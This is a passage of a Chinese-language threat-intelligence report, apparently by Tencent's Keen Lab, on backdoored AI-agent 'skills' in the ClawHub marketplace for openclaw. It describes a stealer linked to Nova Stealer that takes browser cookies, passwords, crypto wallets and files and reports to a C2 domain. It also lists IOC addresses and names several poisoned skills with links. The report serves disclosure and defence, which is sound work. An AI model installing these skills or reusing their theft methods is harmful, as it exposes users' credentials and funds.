style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">    &#34;trailing_bytes_hex&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">:</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">&#34;01000000010000&#34;</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">}</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">}</span></span></code></pre><p style="margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">该恶意程序具备如下功能：</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="margin-bottom: 0px;margin-top: 0px;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">浏览器 Cookie、密码提取</span></span></span></p></li><li><p style="margin-bottom: 0px;margin-top: 0px;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">加密钱包窃取（MetaMask、TronLink 等）</span></span></span></p></li><li><p style="margin-bottom: 0px;margin-top: 0px;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">指定文件窃取</span></span></span></p></li></ul><p style="margin-bottom: 0px;margin-top: 0px;text-indent: 2em;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">经过深入调查溯源，威胁特征与知名信息窃取木马 Nova Stealer 高度相似，疑似来自一个名为 Nova Sentinel 的攻击组织，其以 MaaS（Malware-as-a-Service）形式出售该后门模块。C2 地址指向socifiapp[.]com。以下是完整的攻击链路图示：</span></span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.4291338582677164" data-s="300,640" data-type="png" data-w="1016" style="width:100%;" type="block" data-backw="578" data-backh="826" data-imgfileid="100027382" src="https://wechat2rss.xlab.app/img-proxy/?k=0bcde4c3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwV0kDYRMtDMLm4uBibPUMJnN9W3BR7HSooddH9KGJoNX6MslfdZNKzJ2ERLiafuhD2hvFrft0QjCtoq6h8yb8pic4HzPW64efDZiak%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="malup26b5lj"><div style="display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;" data-mid="" mpa-from-tpl="t" data-pm-slice="4 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;title&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malup26b5lj&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mid="" mpa-from-tpl="t" style="background: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=b569c320&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FOxjH4akCU4SJwFnCk5AB06C08aMkeicKSiczhngyibWGvunYAq1owNQaWqJcDHtYylpGm8n05D4WwyicnCIRGZlNfQ%2F640&#34;) no-repeat;background-size: 31px 26px;width: 31px;height: 26px;text-align: center;padding-right: 3px;margin-right: -24px;margin-top: -12px;z-index: 1;"><p style="font-size: 14px;font-family: PingFangSC-Regular, PingFang SC;color: #FFFFFF;line-height: 19px;" data-mid=""><span leaf="">04</span></p></div><div style="background: #EFF2FF;border-radius: 0px 61px 61px 0px;height: 32px;" data-mid="" mpa-from-tpl="t"><p style="padding: 0px 15px 0px 27px;font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #5171FF;line-height: 32px;letter-spacing: 2px;" data-mid=""><span leaf=""><span textstyle="" style="font-size: 18px;">结语</span></span></p></div></div></div></div><p style="text-align: left;margin: 3pt 0pt;text-indent: 2em;"><span leaf="" style="font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;font-size: 14px;"><span textstyle="" style="font-size: 14px;">在积极拥抱 AI 工具提升效率的同时，我们也应保持冷静审慎。诸如“openclaw”这类工具近期来势汹汹，但其背后潜藏的风险不容忽视，经过深入调查，</span></span><span style="font-size:11pt;font-weight:bold;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);">公开市场接近10%比例的恶意插件比例可谓是防不胜防</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);">。</span><span textstyle="" style="font-size: 14px;"> 尤其当安装环境涉及敏感权限时，更可能为有心之人打开方便之门。  在日常工作中，请务必提高警惕，切勿盲目在办公环境内使用来源不明、未经验证的安全工具或脚本。</span></span></span></p><p style="text-align: left;margin: 3pt 0pt;text-indent: 2em;"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">为了持续守护企业及个人的数字安全，</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">腾讯</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">安全</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">科恩实验室威胁情报团队将携手</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">腾讯</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">电脑管家安全团队与</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">腾讯</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">云安全团队，持续追踪并深入分析此类攻击手法与潜在风险。我们将通过高效协同与技术攻坚，共同推动终端防护能力的迭代升级，致力于为企业用户打造更主动、更精准、更可靠的安全防线。</span></span></span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="malyjiiv20l2" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgba(0, 0, 0, 0.9);font-family: &#34;PingFang SC&#34;, system-ui, -apple-system, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><div data-mid="" mpa-from-tpl="t" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px 12px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;width: 649px;display: flex;justify-content: center;align-items: center;"><div data-mid="" mpa-from-tpl="t" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 625px;"><div data-mid="" mpa-from-tpl="t" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 20px 14px 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;width: 625px;display: flex;justify-content: flex-start;align-items: center;"><div data-mid="" mpa-from-tpl="t" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: flex;justify-content: center;align-items: flex-start;"><div data-mid="" mpa-from-tpl="t" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;transform: skew(30deg);display: flex;justify-content: center;align-items: flex-start;"><div data-mid="" mpa-from-tpl="t" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px 8px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;background: rgb(0, 74, 246);text-align: center;height: 28px;"><p data-mid="" mpa-is-content="t" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;transform: skew(-30deg);font-weight: bold;font-size: 18px;color: rgb(0, 74, 246);line-height: 28px;text-align: center;background-clip: text;background-image: linear-gradient(163deg, rgb(255, 255, 255) 0%, rgb(165, 192, 255) 100%);word-break: break-all;-webkit-text-fill-color: transparent;"><span leaf="" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">附录</span></p></div></div></div></div></div></div></div><h3 style="margin-bottom: 0px;" data-pm-slice="0 0 []"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 16px;color: rgb(0, 82, 255);font-weight: bold;">IOC</span></span></span></h3><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="margin-bottom: 0px;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">91.92.242[.]30</span></span></span></p></li><li><p style="margin-bottom: 0px;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">54.91.154[.]110:13338</span></span></span></p></li><li><p style="margin-bottom: 0px;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">socifiapp[.]com</span></span></span></p></li><li><p style="margin-bottom: 0px;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;"><a href="https://github[.]com/denboss99" target="_blank">https://github[.]com/denboss99</a></span></span></span></p></li></ul><h3 style="margin-bottom: 8px;margin-top: 16px;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 16px;color: rgb(0, 82, 255);font-weight: bold;">部分携带后门的skills类别</span></span></span></h3><table style="border-collapse:collapse;border:none;table-layout:fixed;mso-table-layout-alt:fixed;width:560px;"><tbody><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing:border-box;vertical-align:middle;padding:10px;border-width:0.833333px;border-style:solid;border-color:rgb(239, 239, 239);background-color:#ebe9e9;"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">#</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing:border-box;vertical-align:middle;padding:10px;border-width:0.833333px;border-style:solid;border-color:rgb(239, 239, 239);background-color:#ebe9e9;"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">Skill</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing:border-box;vertical-align:middle;padding:10px;border-width:0.833333px;border-style:solid;border-color:rgb(239, 239, 239);background-color:#ebe9e9;"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">ClawHub链接</span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">1</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">agent-browser-6aigix9qi2tu</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/agent-browser-6aigix9qi2tu" target="_blank">https://www.clawhub.com/skill/agent-browser-6aigix9qi2tu</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">2</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">agent-browser-jrdv4mcscrb2</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/agent-browser-jrdv4mcscrb2" target="_blank">https://www.clawhub.com/skill/agent-browser-jrdv4mcscrb2</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">3</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">agent-browser-ymepfebfpc2x</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/agent-browser-ymepfebfpc2x" target="_blank">https://www.clawhub.com/skill/agent-browser-ymepfebfpc2x</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">4</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">auto-updater-ah1</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/auto-updater-ah1" target="_blank">https://www.clawhub.com/skill/auto-updater-ah1</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">5</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">auto-updater-sgr</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/auto-updater-sgr" target="_blank">https://www.clawhub.com/skill/auto-updater-sgr</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">6</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">base-agent</span></span></span></p></td><td data-colwidth="300" width="449" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://www.clawhub.com/skill/base-agent" target="_blank">https://www.clawhub.com/skill/base-agent</a></span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="41" width="38" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">7</span></span></span></p></td><td data-colwidth="219" width="228" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 